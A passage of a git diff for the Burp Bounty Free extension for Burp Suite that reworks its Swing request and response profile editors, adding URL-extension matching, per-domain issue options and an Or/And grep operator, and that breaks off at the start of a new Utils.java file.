.addContainerGap()) + .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); }// //GEN-END:initComponents + private void radio4stringMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio4stringMatchType + + }//GEN-LAST:event_radio4stringMatchType + + private void radio3regexMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio3regexMatchType + + }//GEN-LAST:event_radio3regexMatchType + private void removetag(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removetag int selectedIndex = listtag.getSelectedIndex(); if (selectedIndex != -1) { @@ -965,32 +1019,6 @@ private void headerstabStateChanged(javax.swing.event.ChangeEvent evt) {//GEN-FI } }//GEN-LAST:event_headerstabStateChanged - private void goweb(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_goweb - try { - Desktop.getDesktop().browse(new URI("https://portswigger.net/burp/extender/api/burp/IParameter.html")); - } catch (URISyntaxException | IOException e) { - callbacks.printError("RequestProfile line 1094: " + "Help web not opened: " + e); - } - }//GEN-LAST:event_goweb - - private void button19addGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button19addGrep - - modelgrep.addRow(new Object[]{true, "Or", "All Request", "Name", "Change me"}); - }//GEN-LAST:event_button19addGrep - - private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button7pasteGrep - String element = getClipboardContents(); - List lines = Arrays.asList(element.split("\n")); - showGreps(lines); - }//GEN-LAST:event_button7pasteGrep - - private void button10removeAllGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button10removeAllGrep - int rowCount = modelgrep.getRowCount(); - for (int i = rowCount - 1; i >= 0; i--) { - modelgrep.removeRow(i); - } - }//GEN-LAST:event_button10removeAllGrep - private void button18removeMatchReplace(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button18removeMatchReplace int[] rows = table4.getSelectedRows(); Arrays.sort(rows); @@ -1001,18 +1029,39 @@ private void button18removeMatchReplace(java.awt.event.ActionEvent evt) {//GEN-F } }//GEN-LAST:event_button18removeMatchReplace - private void radio3regexMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio3regexMatchType - - }//GEN-LAST:event_radio3regexMatchType + private void button10removeAllGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button10removeAllGrep + int rowCount = modelgrep.getRowCount(); + for (int i = rowCount - 1; i >= 0; i--) { + modelgrep.removeRow(i); + } + }//GEN-LAST:event_button10removeAllGrep - private void radio4stringMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radio4stringMatchType + private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button7pasteGrep + String element = getClipboardContents(); + List lines = Arrays.asList(element.split("\n")); + showGreps(lines); + }//GEN-LAST:event_button7pasteGrep - }//GEN-LAST:event_radio4stringMatchType + private void button19addGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button19addGrep + if (modelgrep.getRowCount() == 0) { + modelgrep.addRow(new Object[]{true, "", "All Request", "Value", "Change me"}); + } else { + modelgrep.addRow(new Object[]{true, "Or", "All Request", "Value", "Change me"}); + } + }//GEN-LAST:event_button19addGrep private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button8loadGrep loadGrepsFile(modelgrep); }//GEN-LAST:event_button8loadGrep + private void goweb(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_goweb + try { + Desktop.getDesktop().browse(new URI("https://portswigger.net/burp/extender/api/burp/IParameter.html")); + } catch (URISyntaxException | IOException e) { + System.out.println("RequestProfile line 1094: " + "Help web not opened: " + e); + } + }//GEN-LAST:event_goweb + // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton addTag; @@ -1021,15 +1070,16 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JButton button19; private javax.swing.JButton button7; private javax.swing.JButton button8; - private javax.swing.ButtonGroup buttonGroup1; - private javax.swing.ButtonGroup buttonGroup2; - private javax.swing.ButtonGroup buttonGroup3; - private javax.swing.ButtonGroup buttonGroup4; - private javax.swing.ButtonGroup buttonGroup5; - private javax.swing.ButtonGroup buttonGroup6; - private javax.swing.ButtonGroup buttonGroup7; + public javax.swing.ButtonGroup buttonGroup1; + public javax.swing.ButtonGroup buttonGroup2; + public javax.swing.ButtonGroup buttonGroup3; + public javax.swing.ButtonGroup buttonGroup4; + public javax.swing.ButtonGroup buttonGroup5; + public javax.swing.ButtonGroup buttonGroup6; + public javax.swing.ButtonGroup buttonGroup7; public javax.swing.JCheckBox check1; public javax.swing.JCheckBox check4; + public javax.swing.JCheckBox check73; public javax.swing.JTabbedPane headerstab; private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel12; @@ -1058,7 +1108,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JLabel jLabel5; private javax.swing.JLabel jLabel7; private javax.swing.JLabel jLabel9; - public javax.swing.JPanel jPanel11; + private javax.swing.JPanel jPanel11; private javax.swing.JPanel jPanel12; private javax.swing.JPanel jPanel3; private javax.swing.JScrollPane jScrollPane1; @@ -1075,6 +1125,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ private javax.swing.JSeparator jSeparator8; private javax.swing.JSeparator jSeparator9; public javax.swing.JList listtag; + public javax.swing.JCheckBox negativeURL; public javax.swing.JComboBox newTagCombo; private javax.swing.JButton newTagb; public javax.swing.JRadioButton radio10; @@ -1090,6 +1141,7 @@ private void button8loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_ public javax.swing.JTable table4; public javax.swing.JTextField text1; public javax.swing.JTextField text4; + public javax.swing.JTextField text73; public javax.swing.JTextArea textarea1; public javax.swing.JTextArea textarea2; public javax.swing.JTextArea textarea3; diff --git a/src/ResponseProfile.form b/src/ResponseProfile.form index 6c8a05f..cb7ce46 100755 --- a/src/ResponseProfile.form +++ b/src/ResponseProfile.form @@ -3,23 +3,41 @@ + + + + + + + + + + + + + + + + + + + + + + + - - - - - @@ -43,24 +61,25 @@ - - + + - + - + - + + @@ -109,7 +128,7 @@ - + @@ -186,13 +205,22 @@ - - - - - - - + + + + + + + + + + + + + + + + @@ -212,26 +240,40 @@ - - - - - - - - + + + + + - + + + + + + + + + + + + + + + - + + + + @@ -249,9 +291,10 @@ - - - + + + + @@ -260,16 +303,27 @@ - - - - + + + + + + + + + + + + + + + + + - - - + @@ -295,7 +349,13 @@ - + + + + + + + @@ -317,7 +377,7 @@ - + @@ -616,6 +676,60 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/ResponseProfile.java b/src/ResponseProfile.java index d5c946e..e868b60 100755 --- a/src/ResponseProfile.java +++ b/src/ResponseProfile.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpExtenderCallbacks; import com.google.gson.JsonArray; @@ -35,7 +35,9 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; +import javax.swing.DefaultCellEditor; import javax.swing.DefaultListModel; +import javax.swing.JComboBox; import javax.swing.JDialog; import javax.swing.JFileChooser; import javax.swing.JFrame; @@ -72,8 +74,10 @@ public class ResponseProfile extends javax.swing.JPanel { DefaultTableModel model9; DefaultTableModel model10; DefaultTableModel modelgrep; + DefaultTableModel rulemodel; IBurpExtenderCallbacks callbacks; String filename; + JComboBox operator; public ResponseProfile(IBurpExtenderCallbacks callbacks) { @@ -89,6 +93,7 @@ public ResponseProfile(IBurpExtenderCallbacks callbacks) { headers = new ArrayList(); variationAttributes = new ArrayList(); insertionPointType = new ArrayList(); + operator = new JComboBox(); this.callbacks = callbacks; modelgrep = new DefaultTableModel() { @@ -102,12 +107,12 @@ public Class getColumnClass(int columnIndex) { } return clazz; } - + @Override public boolean isCellEditable(int row, int column) { - if (column == 1) { + if(row == 0 && column == 1){ return false; - } else { + }else{ return true; } } @@ -116,16 +121,19 @@ public boolean isCellEditable(int row, int column) { initComponents(); - if (callbacks.loadExtensionSetting("filename") != null) { - filename = callbacks.loadExtensionSetting("filename")+ File.separator;; + if (callbacks.loadExtensionSetting("filename") != null) { + filename = callbacks.loadExtensionSetting("filename") + File.separator; } else { - filename = System.getProperty("user.home")+ File.separator;; + filename = System.getProperty("user.home") + File.separator; } showTags(); showGrepsTable(); } + + + public String getClipboardContents() { //Get clipboard contents for implement grep and match paste button String result = ""; @@ -137,7 +145,7 @@ public String getClipboardContents() { try { result = (String) contents.getTransferData(DataFlavor.stringFlavor); } catch (UnsupportedFlavorException | IOException ex) { - callbacks.printError("ResponseProfile line 151: " + ex.getMessage()); + System.out.println("ResponseProfile line 151: "+ex.getMessage()); } } return result; @@ -174,9 +182,9 @@ public void loadGrepsFile(DefaultTableModel model) { bufferreader.close(); showGreps(grep); } catch (FileNotFoundException ex) { - callbacks.printError("ResponseProfile line 189:"); + System.out.println("ResponseProfile line 189:"); } catch (IOException ex) { - callbacks.printError("ResponseProfile line 193:"); + System.out.println("ResponseProfile line 193:"); } } } @@ -202,29 +210,33 @@ public JsonArray initJson() { } return data; } catch (Exception e) { - callbacks.printError("ResponseProfile line 216: " + e.getMessage()); + System.out.println("ResponseProfile line 216: "+e.getMessage()); return null; } } public void showGrepsTable() { - + modelgrep.setNumRows(0); modelgrep.setColumnCount(0); modelgrep.addColumn("Enabled"); modelgrep.addColumn("Operator"); - modelgrep.addColumn("Grep Value"); + modelgrep.addColumn("Value"); + + operator.addItem("Or"); + operator.addItem("And"); table4.getColumnModel().getColumn(0).setPreferredWidth(7); table4.getColumnModel().getColumn(1).setPreferredWidth(15); table4.getColumnModel().getColumn(2).setPreferredWidth(460); + table4.getColumnModel().getColumn(1).setCellEditor(new DefaultCellEditor(operator)); TableRowSorter sorter = new TableRowSorter<>(table4.getModel()); table4.setRowSorter(sorter); List sortKeys = new ArrayList<>(); sorter.setSortKeys(sortKeys); sorter.sort(); - + } public void showGreps(List greps) { @@ -232,13 +244,25 @@ public void showGreps(List greps) { for (String grepline : greps) { List array = Arrays.asList(grepline.split(",",3)); if (array.size() > 1) { - if (array.get(0).equals("true")) { - modelgrep.addRow(new Object[]{true, array.get(1), array.get(2)}); + if (modelgrep.getRowCount() == 0) { + if (array.get(0).equals("true")) { + modelgrep.addRow(new Object[]{true, "", array.get(2)}); + } else { + modelgrep.addRow(new Object[]{false, "", array.get(2)}); + } } else { - modelgrep.addRow(new Object[]{false, array.get(1), array.get(2)}); + if (array.get(0).equals("true")) { + modelgrep.addRow(new Object[]{true, array.get(1), array.get(2)}); + } else { + modelgrep.addRow(new Object[]{false, array.get(1), array.get(2)}); + } } } else { - modelgrep.addRow(new Object[]{true, "Or", grepline}); + if (modelgrep.getRowCount() == 0) { + modelgrep.addRow(new Object[]{true, "", grepline}); + } else { + modelgrep.addRow(new Object[]{true, "Or", grepline}); + } } } } @@ -250,7 +274,7 @@ public void addNewTag(String str) { out.write(str.concat("\n")); out.close(); } catch (IOException e) { - callbacks.printError("ResponseProfile line 281: " + "exception occoured" + e.getMessage()); + System.out.println("ResponseProfile line 281: "+"exception occoured" + e.getMessage()); } } } @@ -262,7 +286,7 @@ public void removeTag(String tag) { File inFile = new File(file); if (!inFile.isFile()) { - callbacks.printError("ResponseProfile line 293: " + "Parameter is not an existing file"); + System.out.println("ResponseProfile line 293: "+"Parameter is not an existing file"); return; } @@ -288,19 +312,19 @@ public void removeTag(String tag) { //Delete the original file if (!inFile.delete()) { - callbacks.printError("ResponseProfile line 319: " + "Could not delete file"); + System.out.println("ResponseProfile line 319: "+"Could not delete file"); return; } //Rename the new file to the filename the original file had. if (!tempFile.renameTo(inFile)) { - callbacks.printError("ResponseProfile line 325: " + "Could not rename file"); + System.out.println("ResponseProfile line 325: "+"Could not rename file"); } } catch (FileNotFoundException ex) { - callbacks.printError("ResponseProfile line 329:"); + System.out.println("ResponseProfile line 329:"); } catch (IOException ex) { - callbacks.printError("ResponseProfile line 333:"); + System.out.println("ResponseProfile line 333:"); } } @@ -325,9 +349,9 @@ private List readFile(String filename) { records.add(line); } reader.close(); - + } catch (Exception e) { - callbacks.printError("ResponsePorfile line 372:" + e.getMessage()); + System.out.println("ResponsePorfile line 372:"+e.getMessage()); } return records; } @@ -347,6 +371,7 @@ private void initComponents() { buttonGroup4 = new javax.swing.ButtonGroup(); buttonGroup5 = new javax.swing.ButtonGroup(); buttonGroup6 = new javax.swing.ButtonGroup(); + buttonGroup7 = new javax.swing.ButtonGroup(); text1 = new javax.swing.JTextField(); jLabel18 = new javax.swing.JLabel(); jLabel12 = new javax.swing.JLabel(); @@ -390,6 +415,12 @@ private void initComponents() { button8 = new javax.swing.JButton(); button7 = new javax.swing.JButton(); jLabel1 = new javax.swing.JLabel(); + check73 = new javax.swing.JCheckBox(); + text73 = new javax.swing.JTextField(); + negativeURL = new javax.swing.JCheckBox(); + first_match = new javax.swing.JRadioButton(); + jLabel5 = new javax.swing.JLabel(); + all_matches = new javax.swing.JRadioButton(); jScrollPane10 = new javax.swing.JScrollPane(); jPanel12 = new javax.swing.JPanel(); jLabel32 = new javax.swing.JLabel(); @@ -439,8 +470,6 @@ private void initComponents() { jLabel47 = new javax.swing.JLabel(); newTagb = new javax.swing.JButton(); - setPreferredSize(new java.awt.Dimension(800, 600)); - text1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N jLabel18.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N @@ -453,7 +482,7 @@ private void initComponents() { headerstab.setAutoscrolls(true); headerstab.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N - headerstab.setPreferredSize(new java.awt.Dimension(780, 570)); + headerstab.setPreferredSize(new java.awt.Dimension(800, 600)); headerstab.addChangeListener(new javax.swing.event.ChangeListener() { public void stateChanged(javax.swing.event.ChangeEvent evt) { headerstabStateChanged(evt); @@ -573,6 +602,28 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { jLabel1.setText("Match Type: "); + check73.setText("URL Extension"); + + negativeURL.setText("Negative match"); + + buttonGroup7.add(first_match); + first_match.setText("Only once per domain"); + first_match.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + first_matchstringMatchType(evt); + } + }); + + jLabel5.setText("Show issue:"); + + buttonGroup7.add(all_matches); + all_matches.setText("All times in a domain"); + all_matches.addItemListener(new java.awt.event.ItemListener() { + public void itemStateChanged(java.awt.event.ItemEvent evt) { + all_matchesregexMatchType(evt); + } + }); + javax.swing.GroupLayout jPanel11Layout = new javax.swing.GroupLayout(jPanel11); jPanel11.setLayout(jPanel11Layout); jPanel11Layout.setHorizontalGroup( @@ -610,12 +661,18 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(check71)) .addGap(15, 15, 15) .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(text71, javax.swing.GroupLayout.DEFAULT_SIZE, 547, Short.MAX_VALUE) - .addComponent(text72)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(negativeCT) - .addComponent(negativeRC))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(text71) + .addComponent(text72)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(negativeCT) + .addComponent(negativeRC))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addComponent(text73, javax.swing.GroupLayout.PREFERRED_SIZE, 547, javax.swing.GroupLayout.PREFERRED_SIZE) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addComponent(negativeURL)))) .addComponent(jLabel30, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE)))) .addGroup(jPanel11Layout.createSequentialGroup() .addContainerGap() @@ -629,18 +686,29 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) .addComponent(jLabel24, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel11Layout.createSequentialGroup() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) - .addComponent(jLabel1) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false) - .addComponent(button18, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(button10, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) - .addComponent(button7, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(button19, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE))) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false) + .addComponent(button18, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(button10, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addComponent(button7, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(button19, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)) .addGap(18, 18, 18) .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(radio3) - .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 662, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(radio4)))))))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addComponent(jLabel1) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(radio3) + .addComponent(radio4)) + .addGap(85, 85, 85) + .addComponent(jLabel5) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(all_matches) + .addComponent(first_match))) + .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 662, javax.swing.GroupLayout.PREFERRED_SIZE))))))) + .addGroup(jPanel11Layout.createSequentialGroup() + .addContainerGap() + .addComponent(check73))) .addContainerGap(42, Short.MAX_VALUE)) ); @@ -657,8 +725,9 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(button8)) - .addGap(18, 18, Short.MAX_VALUE) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, 18, Short.MAX_VALUE) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 206, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel11Layout.createSequentialGroup() .addComponent(button19) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) @@ -666,15 +735,22 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button10) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(button18)) - .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 128, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addComponent(button18))) + .addGap(18, 18, 18) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(jLabel1) + .addComponent(radio4)) + .addGap(1, 1, 1) + .addComponent(radio3)) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(jLabel5) + .addComponent(first_match)) + .addGap(1, 1, 1) + .addComponent(all_matches))) .addGap(18, 18, 18) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) - .addComponent(jLabel1) - .addComponent(radio4)) - .addGap(1, 1, 1) - .addComponent(radio3) - .addGap(18, 18, Short.MAX_VALUE) .addComponent(jSeparator6, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel31) @@ -698,7 +774,12 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(check72) .addComponent(text72, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(negativeRC)) - .addGap(18, 18, 18) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(check73) + .addComponent(text73, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(negativeURL)) + .addGap(26, 26, 26) .addComponent(jSeparator5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel29) @@ -718,7 +799,7 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel2) .addComponent(sp1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) + .addContainerGap(22, Short.MAX_VALUE)) ); jPanel11Layout.linkSize(javax.swing.SwingConstants.VERTICAL, new java.awt.Component[] {button10, button18, button19, button7, button8}); @@ -1043,21 +1124,22 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGap(18, 18, 18) .addComponent(jLabel18) .addGap(18, 18, 18) - .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, 223, javax.swing.GroupLayout.PREFERRED_SIZE) - .addContainerGap()) - .addComponent(headerstab, javax.swing.GroupLayout.DEFAULT_SIZE, 800, Short.MAX_VALUE) + .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, 165, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(70, 70, 70)) + .addComponent(headerstab, javax.swing.GroupLayout.DEFAULT_SIZE, 831, Short.MAX_VALUE) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addContainerGap() .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(text1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel12) .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel18)) - .addGap(18, 18, 18) - .addComponent(headerstab, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(headerstab, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); }// //GEN-END:initComponents @@ -1114,8 +1196,11 @@ private void headerstabStateChanged(javax.swing.event.ChangeEvent evt) {//GEN-FI }//GEN-LAST:event_headerstabStateChanged private void addGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_addGrep - - modelgrep.addRow(new Object[]{true, "Or", "Value"}); + if (modelgrep.getRowCount() == 0) { + modelgrep.addRow(new Object[]{true, "", "Value"}); + } else { + modelgrep.addRow(new Object[]{true, "Or", "Value"}); + } }//GEN-LAST:event_addGrep @@ -1139,25 +1224,37 @@ private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event showGreps(lines); }//GEN-LAST:event_button7pasteGrep + private void first_matchstringMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_first_matchstringMatchType + // TODO add your handling code here: + }//GEN-LAST:event_first_matchstringMatchType + + private void all_matchesregexMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_all_matchesregexMatchType + // TODO add your handling code here: + }//GEN-LAST:event_all_matchesregexMatchType + // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton addTag; + public javax.swing.JRadioButton all_matches; private javax.swing.JButton button10; private javax.swing.JButton button18; private javax.swing.JButton button19; private javax.swing.JButton button7; private javax.swing.JButton button8; - private javax.swing.ButtonGroup buttonGroup1; - private javax.swing.ButtonGroup buttonGroup2; - private javax.swing.ButtonGroup buttonGroup3; - private javax.swing.ButtonGroup buttonGroup4; - private javax.swing.ButtonGroup buttonGroup5; - private javax.swing.ButtonGroup buttonGroup6; + public javax.swing.ButtonGroup buttonGroup1; + public javax.swing.ButtonGroup buttonGroup2; + public javax.swing.ButtonGroup buttonGroup3; + public javax.swing.ButtonGroup buttonGroup4; + public javax.swing.ButtonGroup buttonGroup5; + public javax.swing.ButtonGroup buttonGroup6; + public javax.swing.ButtonGroup buttonGroup7; public javax.swing.JCheckBox check1; public javax.swing.JCheckBox check4; public javax.swing.JCheckBox check71; public javax.swing.JCheckBox check72; + public javax.swing.JCheckBox check73; public javax.swing.JCheckBox excludehttp; + public javax.swing.JRadioButton first_match; public javax.swing.JTabbedPane headerstab; private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel12; @@ -1186,6 +1283,7 @@ private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event private javax.swing.JLabel jLabel41; private javax.swing.JLabel jLabel46; private javax.swing.JLabel jLabel47; + private javax.swing.JLabel jLabel5; private javax.swing.JLabel jLabel6; private javax.swing.JLabel jLabel7; private javax.swing.JLabel jLabel9; @@ -1209,6 +1307,7 @@ private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event public javax.swing.JList listtag; public javax.swing.JCheckBox negativeCT; public javax.swing.JCheckBox negativeRC; + public javax.swing.JCheckBox negativeURL; public javax.swing.JComboBox newTagCombo; private javax.swing.JButton newTagb; public javax.swing.JCheckBox onlyhttp; @@ -1232,6 +1331,7 @@ private void button7pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event public javax.swing.JTextField text4; public javax.swing.JTextField text71; public javax.swing.JTextField text72; + public javax.swing.JTextField text73; public javax.swing.JTextArea textarea1; public javax.swing.JTextArea textarea2; public javax.swing.JTextArea textarea3; diff --git a/src/Utils.java b/src/Utils.java new file mode 100755 index 0000000..f2791ee --- /dev/null +++ b/src/Utils.java @@ -0,0 +1,462 @@ +/* +Copyright 2018 Eduardo Garcia Melia + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. + */ +package burpbountyfree; + +import burp.IBurpExtenderCallbacks; +import burp.IExtensionHelpers; +import burp.IHttpRequestResponse; +import burp.IHttpService; +import burp.IRequestInfo; +import burp.IResponseInfo; +import 